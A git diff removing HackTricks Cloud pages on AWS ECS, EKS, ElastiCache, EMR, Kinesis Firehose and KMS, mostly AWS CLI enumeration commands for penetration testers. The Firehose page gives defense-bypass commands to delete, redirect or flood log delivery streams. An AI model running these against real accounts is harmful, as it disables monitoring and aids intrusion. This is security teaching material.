-[aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
deleted file mode 100644
index 198b4e856..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
+++ /dev/null
@@ -1,108 +0,0 @@
-# AWS - ECS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## ECS
-
-### Basic Information
-
-Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**.
-
-ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**.
-
-* **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”.
-* **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups.
- * There **2 types of applications**:
- * **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application.
- * **Task**: A standalone task that runs and terminates. For example, a batch job.
- * Among the service applications, there are **2 types of service schedulers**:
- * [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node.
- * [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies.
-* **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**...
- * Check **env variables for sensitive info**!
-
-### Sensitive Data In Task Definitions
-
-Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within.
-
-Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions.
-
-### Enumeration
-
-```bash
-# Clusters info
-aws ecs list-clusters
-aws ecs describe-clusters --clusters
-
-# Container instances
-## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster.
-aws ecs list-container-instances --cluster
-aws ecs describe-container-instances --cluster --container-instances
-
-# Services info
-aws ecs list-services --cluster
-aws ecs describe-services --cluster --services
-aws ecs describe-task-sets --cluster --service
-
-# Task definitions
-aws ecs list-task-definition-families
-aws ecs list-task-definitions
-aws ecs list-tasks --cluster
-aws ecs describe-tasks --cluster --tasks
-## Look for env vars and secrets used from the task definition
-aws ecs describe-task-definition --task-definition :
-```
-
-### Unauthenticated Access
-
-{% content-ref url="../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md" %}
-[aws-ecs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md)
-{% endcontent-ref %}
-
-### Privesc
-
-In the following page you can check how to **abuse ECS permissions to escalate privileges**:
-
-{% content-ref url="../aws-privilege-escalation/aws-ecs-privesc.md" %}
-[aws-ecs-privesc.md](../aws-privilege-escalation/aws-ecs-privesc.md)
-{% endcontent-ref %}
-
-### Post Exploitation
-
-{% content-ref url="../aws-post-exploitation/aws-ecs-post-exploitation.md" %}
-[aws-ecs-post-exploitation.md](../aws-post-exploitation/aws-ecs-post-exploitation.md)
-{% endcontent-ref %}
-
-### Persistence
-
-{% content-ref url="../aws-persistence/aws-ecs-persistence.md" %}
-[aws-ecs-persistence.md](../aws-persistence/aws-ecs-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
deleted file mode 100644
index b99caa683..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
+++ /dev/null
@@ -1,72 +0,0 @@
-# AWS - EKS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## EKS - -Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. - -Key aspects of Amazon EKS include: - -1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. -2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. -3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. -4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. - -#### Enumeration - -```bash -aws eks list-clusters -aws eks describe-cluster --name -# Check for endpointPublicAccess and publicAccessCidrs - -aws eks list-fargate-profiles --cluster-name -aws eks describe-fargate-profile --cluster-name --fargate-profile-name - -aws eks list-identity-provider-configs --cluster-name -aws eks describe-identity-provider-config --cluster-name --identity-provider-config - -aws eks list-nodegroups --cluster-name -aws eks describe-nodegroup --cluster-name --nodegroup-name - -aws eks list-updates --name -aws eks describe-update --name --update-id -``` - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-eks-post-exploitation.md" %} -[aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
deleted file mode 100644
index 8839a6598..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# AWS - ElastiCache
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## ElastiCache
-
-AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**.
-
-### Enumeration
-
-```bash
-# ElastiCache clusters
-## Check the SecurityGroups to later check who can access
-## In Redis clusters: Check AuthTokenEnabled to see if you need password
-## In memcache clusters: You can find the URL to connect
-aws elasticache describe-cache-clusters
-
-# List all ElastiCache replication groups
-## Find here the accesible URLs for Redis clusters
-aws elasticache describe-replication-groups
-
-#List all ElastiCache parameter groups
-aws elasticache describe-cache-parameter-groups
-
-#List all ElastiCache security groups
-## If this gives an error it's because it's using SGs from EC2
-aws elasticache describe-cache-security-groups
-
-#List all ElastiCache subnet groups
-aws elasticache describe-cache-subnet-groups
-
-# Get snapshots
-aws elasticache describe-snapshots
-
-# Get users and groups
-aws elasticache describe-user-groups
-aws elasticache describe-users
-
-# List ElastiCache events
-aws elasticache describe-events
-```
-
-### Privesc (TODO)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
deleted file mode 100644
index be430d055..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# AWS - EMR Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EMR
-
-AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark.
-
-Key characteristics include:
-
-* **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features:
- * **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider.
- * **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop:
- * Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer.
- * HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm.
-* **Encryption in Transit**: Focuses on securing data during transfer. Options include:
- * **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider:
- * **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket.
- * **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts.
-
-Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version:
-
-* **Hadoop**:
- * Might reduce encrypted shuffle using TLS.
- * Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption.
-* **Presto** (EMR version 5.6.0+):
- * Internal communication between Presto nodes is secured using SSL and TLS.
-* **Tez Shuffle Handler**:
- * Utilizes TLS for encryption.
-* **Spark**:
- * Employs TLS for the Akka protocol.
- * Uses Simple Authentication Security Layer and 3DES for Block Transfer Service.
- * External shuffle service is secured with the Simple Authentication Security Layer.
-
-These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases.
-
-#### Enumeration
-
-```bash
-aws emr list-clusters
-aws emr describe-cluster --cluster-id
-aws emr list-instances --cluster-id
-aws emr list-instance-fleets --cluster-id
-aws emr list-steps --cluster-id
-aws emr list-notebook-executions
-aws emr list-security-configurations
-aws emr list-studios #Get studio URLs
-```
-
-#### Privesc
-
-{% content-ref url="../aws-privilege-escalation/aws-emr-privesc.md" %}
-[aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md)
-{% endcontent-ref %}
-
-## References
-
-* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
deleted file mode 100644
index 34909d625..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
+++ /dev/null
@@ -1,77 +0,0 @@
-# AWS - Kinesis Data Firehose Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Kinesis Data Firehose
-
-Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints.
-
-The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases.
-
-### Enumeration
-
-```bash
-# Get delivery streams
-aws firehose list-delivery-streams
-
-# Get stream info
-aws firehose describe-delivery-stream --delivery-stream-name
-## Get roles
-aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN
-```
-
-## Post-exploitation / Defense Bypass
-
-In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly.
-
-### firehose:DeleteDeliveryStream
-
-```
-aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete
-```
-
-### firehose:UpdateDestination
-
-```
-aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id
-```
-
-### firehose:PutRecord | firehose:PutRecordBatch
-
-```
-aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}'
-
-aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json
-```
-
-## References
-
-* [https://docs.amazonaws.cn/en\_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
deleted file mode 100644
index f1b5c3bdf..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
+++ /dev/null
@@ -1,183 +0,0 @@
-# AWS - KMS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## KMS - Key Management Service - -AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. - -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. - -KMS is a **region specific service**. - -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. - -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. - -A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. - -There are 2 types of master keys: - -* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. 
-* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. - -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. - -### Key Policies - -These defines **who can use and access a key in KMS**. - -By **default:** - -* It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. - - Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. - - * Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. -* It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. - - **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. -* It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. - -**Default policy** example: - -```json -{ - "Sid": "Enable IAM policies", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::111122223333:root" - }, - "Action": "kms:*", - "Resource": "*" -} -``` - -{% hint style="warning" %} -If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. -{% endhint %} - -
- -Policy Details - -Properties of a policy: - -* JSON based document -* Resource --> Affected resources (can be "\*") -* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -* Effect --> Allow/Deny -* Principal --> arn affected -* Conditions (optional) --> Condition to give the permissions - -Grants: - -* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -* After the grant is created a GrantToken and a GratID are issued - -**Access**: - -* Via **key policy** -- If this exist, this takes **precedent** over the IAM policy -* Via **IAM policy** -* Via **grants** - -
- -### Key Administrators - -Key administrator by default: - -* Have access to manage KMS but not to encrypt or decrypt data -* Only IAM users and roles can be added to Key Administrators list (not groups) -* If external CMK is used, Key Administrators have the permission to import key material - -### Rotation of CMKs - -* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -* **Older keys are retained** to decrypt data that was encrypted prior to the rotation -* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. - -#### Manual rotation - -* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -* You need to **keep old keys to decrypt old files** encrypted with it. - -You can import keys from your on-premises key infrastructure . - -### Other relevant KMS information - -KMS is priced per number of encryption/decryption requests received from all services per month. - -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. 
- -With KMS policy you can do the following: - -* Limit who can create data keys and which services have access to use these keys -* Limit systems access to encrypt only, decrypt only or both -* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). - -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -### Enumeration - -```bash -aws kms list-keys -aws kms list-key-policies --key-id -aws kms list-grants --key-id -aws kms describe-key --key-id -aws kms get-key-policy --key-id --policy-name # Default policy name is "default" -aws kms describe-custom-key-stores -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-kms-privesc.md" %} -[aws-kms-privesc.md](../aws-privilege-escalation/aws-kms-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-kms-persistence.md" %} -[aws-kms-persistence.md](../aws-persistence/aws-kms-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
deleted file mode 100644
index 3d2778ee1..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# AWS - Lightsail Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
